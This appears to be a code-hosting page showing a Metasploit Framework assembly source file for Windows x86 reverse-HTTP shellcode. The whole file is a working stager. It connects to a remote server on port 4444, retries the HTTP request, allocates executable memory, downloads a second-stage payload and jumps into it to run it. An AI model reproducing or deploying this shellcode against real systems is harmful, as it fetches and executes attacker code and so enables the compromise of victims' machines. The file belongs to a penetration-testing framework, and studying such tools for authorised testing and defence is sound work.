/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm

https://github.com/icewall/metasploit-framework · Assembly · 141 lines · 104 code · 23 blank · 14 comment · 0 complexity · cbed56bc16862e34dde947979c0b7b4c MD5 · raw file 

    

  1. ;-----------------------------------------------------------------------------;

    2. 

  2. ; Author: HD Moore

    3. 

  3. ; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000

    4. 

  4. ; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1)

    5. 

  5. ; Version: 1.0

    6. 

  6. ;-----------------------------------------------------------------------------;

    7. 

  7. [BITS 32]

    8. 

  8. 

    9. 

  9. ; Input: EBP must be the address of 'api_call'.

    10. 

  10. ; Output: EDI will be the socket for the connection to the server

    11. 

  11. ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)

    12. 

  12. load_wininet:

    13. 

  13.   push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.

    14. 

  14.   push 0x696e6977        ; ...

    15. 

  15.   push esp               ; Push a pointer to the "wininet" string on the stack.

    16. 

  16.   push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )

    17. 

  17.   call ebp               ; LoadLibraryA( "wininet" )

    18. 

  18. 

    19. 

  19. internetopen:

    20. 

  20.   xor edi,edi

    21. 

  21.   push edi               ; DWORD dwFlags

    22. 

  22.   push edi               ; LPCTSTR lpszProxyBypass

    23. 

  23.   push edi               ; LPCTSTR lpszProxyName

    24. 

  24.   push edi               ; DWORD dwAccessType (PRECONFIG = 0)

    25. 

  25.   push byte 0            ; NULL pointer

    26. 

  26.   push esp               ; LPCTSTR lpszAgent ("\x00")

    27. 

  27.   push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )

    28. 

  28.   call ebp

    29. 

  29. 

    30. 

  30.   jmp short dbl_get_server_host

    31. 

  31. 

    32. 

  32. internetconnect:

    33. 

  33.   pop ebx                ; Save the hostname pointer

    34. 

  34.   xor ecx, ecx

    35. 

  35.   push ecx               ; DWORD_PTR dwContext (NULL)

    36. 

  36.   push ecx               ; dwFlags

    37. 

  37.   push byte 3            ; DWORD dwService (INTERNET_SERVICE_HTTP)

    38. 

  38.   push ecx               ; password

    39. 

  39.   push ecx               ; username

    40. 

  40.   push dword 4444        ; PORT

    41. 

  41.   push ebx               ; HOSTNAME

    42. 

  42.   push eax               ; HINTERNET hInternet

    43. 

  43.   push 0xC69F8957        ; hash( "wininet.dll", "InternetConnectA" )

    44. 

  44.   call ebp

    45. 

  45. 

    46. 

  46.   jmp get_server_uri

    47. 

  47. 

    48. 

  48. httpopenrequest:

    49. 

  49.   pop ecx

    50. 

  50.   xor edx, edx           ; NULL

    51. 

  51.   push edx               ; dwContext (NULL)

    52. 

  52.   push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags

    53. 

  53.     ;0x80000000 |        ; INTERNET_FLAG_RELOAD

    54. 

  54.     ;0x04000000 |        ; INTERNET_NO_CACHE_WRITE

    55. 

  55. 	;0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT

    56. 

  56.     ;0x00000200 |        ; INTERNET_FLAG_NO_UI

    57. 

  57.     ;0x00400000          ; INTERNET_FLAG_KEEP_CONNECTION

    58. 

  58.   push edx               ; accept types

    59. 

  59.   push edx               ; referrer

    60. 

  60.   push edx               ; version

    61. 

  61.   push ecx               ; url

    62. 

  62.   push edx               ; method

    63. 

  63.   push eax               ; hConnection

    64. 

  64.   push 0x3B2E55EB        ; hash( "wininet.dll", "HttpOpenRequestA" )

    65. 

  65.   call ebp

    66. 

  66.   mov esi, eax           ; hHttpRequest

    67. 

  67. 

    68. 

  68. set_retry:

    69. 

  69.   push byte 0x10

    70. 

  70.   pop ebx

    71. 

  71. 

    72. 

  72. httpsendrequest:

    73. 

  73.   xor edi, edi

    74. 

  74.   push edi               ; optional length

    75. 

  75.   push edi               ; optional

    76. 

  76.   push edi               ; dwHeadersLength

    77. 

  77.   push edi               ; headers

    78. 

  78.   push esi               ; hHttpRequest

    79. 

  79.   push 0x7B18062D        ; hash( "wininet.dll", "HttpSendRequestA" )

    80. 

  80.   call ebp

    81. 

  81.   test eax,eax

    82. 

  82.   jnz short allocate_memory

    83. 

  83. 

    84. 

  84. try_it_again:

    85. 

  85.   dec ebx

    86. 

  86.   jz failure

    87. 

  87.   jmp short httpsendrequest

    88. 

  88. 

    89. 

  89. dbl_get_server_host:

    90. 

  90.   jmp get_server_host

    91. 

  91. 

    92. 

  92. get_server_uri:

    93. 

  93.   call httpopenrequest

    94. 

  94. 

    95. 

  95. server_uri:

    96. 

  96.  db "/12345", 0x00

    97. 

  97. 

    98. 

  98. failure:

    99. 

  99.   push 0x56A2B5F0        ; hardcoded to exitprocess for size

    100. 

  100.   call ebp

    101. 

  101. 

    102. 

  102. allocate_memory:

    103. 

  103.   push byte 0x40         ; PAGE_EXECUTE_READWRITE

    104. 

  104.   push 0x1000            ; MEM_COMMIT

    105. 

  105.   push 0x00400000        ; Stage allocation (8Mb ought to do us)

    106. 

  106.   push edi               ; NULL as we dont care where the allocation is (zero'd from the prev function)

    107. 

  107.   push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )

    108. 

  108.   call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );

    109. 

  109. 

    110. 

  110. download_prep:

    111. 

  111.   xchg eax, ebx          ; place the allocated base address in ebx

    112. 

  112.   push ebx               ; store a copy of the stage base address on the stack

    113. 

  113.   push ebx               ; temporary storage for bytes read count

    114. 

  114.   mov edi, esp           ; &bytesRead

    115. 

  115. 

    116. 

  116. download_more:

    117. 

  117.   push edi               ; &bytesRead

    118. 

  118.   push 8192              ; read length

    119. 

  119.   push ebx               ; buffer

    120. 

  120.   push esi               ; hRequest

    121. 

  121.   push 0xE2899612        ; hash( "wininet.dll", "InternetReadFile" )

    122. 

  122.   call ebp

    123. 

  123. 

    124. 

  124.   test eax,eax           ; download failed? (optional?)

    125. 

  125.   jz failure

    126. 

  126. 

    127. 

  127.   mov eax, [edi]

    128. 

  128.   add ebx, eax           ; buffer += bytes_received

    129. 

  129. 

    130. 

  130.   test eax,eax           ; optional?

    131. 

  131.   jnz download_more      ; continue until it returns 0

    132. 

  132.   pop eax                ; clear the temporary storage

    133. 

  133. 

    134. 

  134. execute_stage:

    135. 

  135.   ret                    ; dive into the stored stage address

    136. 

  136. 

    137. 

  137. get_server_host:

    138. 

  138.   call internetconnect

    139. 

  139. 

    140. 

  140. server_host:
    141.